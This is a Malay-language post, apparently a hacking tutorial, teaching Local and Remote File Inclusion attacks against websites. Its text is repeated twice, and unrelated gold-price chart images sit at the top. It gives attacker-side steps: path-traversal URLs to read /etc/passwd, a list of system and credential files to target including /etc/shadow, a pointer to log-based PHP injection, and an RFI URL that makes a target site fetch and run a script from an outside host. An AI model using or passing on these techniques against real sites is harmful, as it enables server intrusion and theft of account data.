![[Most Recent Quotes from www.kitco.com]](http://www.kitconet.com/charts/metals/gold/t24_au_en_usoz_2.gif)
![[Most Recent Quotes from www.kitco.com]](http://www.kitconet.com/images/quotes_special.gif)
Secara ringkas apakah itu LFI dan RFI?
LFI (Local File Inclusion) ialah satu lubang yang terdapat pada site dimana attacker boleh mengakses semua file yang terdapat didalam server dengan menggunakan URL.
cara-cara LFI dilakukan :
- masukan didalam URL site vuln tersebut ../../../../../../../../../etc/passwd
- ../ menandakan kedalaman folder tempat file index.php, dengan itu fail password akan ditampilkan di browser.
- jika terdapat error seperti ini :
Code:
Warning: main(../../../../../../../../../etc/passwd.php) [function.main]: failed to open stream: No such file or directory in /their/web/root/index.php on line 2
Tambahkan (null injection untuk menghilangkan apa-apa karakter selepas passwd) dibelakangnya :
Code:
http://www.sitetarget.com/index.php?framefile=../../../../../../../../../etc/passwd
- kebiasaannya akan keluar paparan :
Code:
username: passwd:UID:GID:full_name:directory:shell
atau
Code:
username:x:503:100:FullName:/home/username:/bin/sh
- antara tempat lain yang boleh di cuba untuk dilawati ialah :
Code:
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default
- seterusnya kita lakukan injection php code melalui log. boleh rujuk tutorial yang lebih advance jika paham konsep ini.
download video lfi :
RFI (Remote File Inclusion) ialah satu lubang yang mana attacker boleh include (menggabungkan) file dari luar server untuk dijalankan.
cara-cara RFI dilakukan :
- teknik RFI ialah kite gabungkan link fail remote dari site luar dengan website target :
Code:
http://www.sitetarget.com/index.php?framefile=http://www.fileremote.com/script.txt?
- fail fileremote.com/script.txt itu ialah fail remote kita yang akan dijalankan oleh site tersebut sebagai file *.php .
LFI (Local File Inclusion) ialah satu lubang yang terdapat pada site dimana attacker boleh mengakses semua file yang terdapat didalam server dengan menggunakan URL.
cara-cara LFI dilakukan :
- masukan didalam URL site vuln tersebut ../../../../../../../../../etc/passwd
- ../ menandakan kedalaman folder tempat file index.php, dengan itu fail password akan ditampilkan di browser.
- jika terdapat error seperti ini :
Code:
Warning: main(../../../../../../../../../etc/passwd.php) [function.main]: failed to open stream: No such file or directory in /their/web/root/index.php on line 2
Tambahkan (null injection untuk menghilangkan apa-apa karakter selepas passwd) dibelakangnya :
Code:
http://www.sitetarget.com/index.php?framefile=../../../../../../../../../etc/passwd
- kebiasaannya akan keluar paparan :
Code:
username: passwd:UID:GID:full_name:directory:shell
atau
Code:
username:x:503:100:FullName:/home/username:/bin/sh
- antara tempat lain yang boleh di cuba untuk dilawati ialah :
Code:
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default
- seterusnya kita lakukan injection php code melalui log. boleh rujuk tutorial yang lebih advance jika paham konsep ini.
download video lfi :
http://www.mediafire.com/?m1imrwwmdmw
RFI (Remote File Inclusion) ialah satu lubang yang mana attacker boleh include (menggabungkan) file dari luar server untuk dijalankan.
cara-cara RFI dilakukan :
- teknik RFI ialah kite gabungkan link fail remote dari site luar dengan website target :
Code:
http://www.sitetarget.com/index.php?framefile=http://www.fileremote.com/script.txt?
- fail fileremote.com/script.txt itu ialah fail remote kita yang akan dijalankan oleh site tersebut sebagai file *.php .
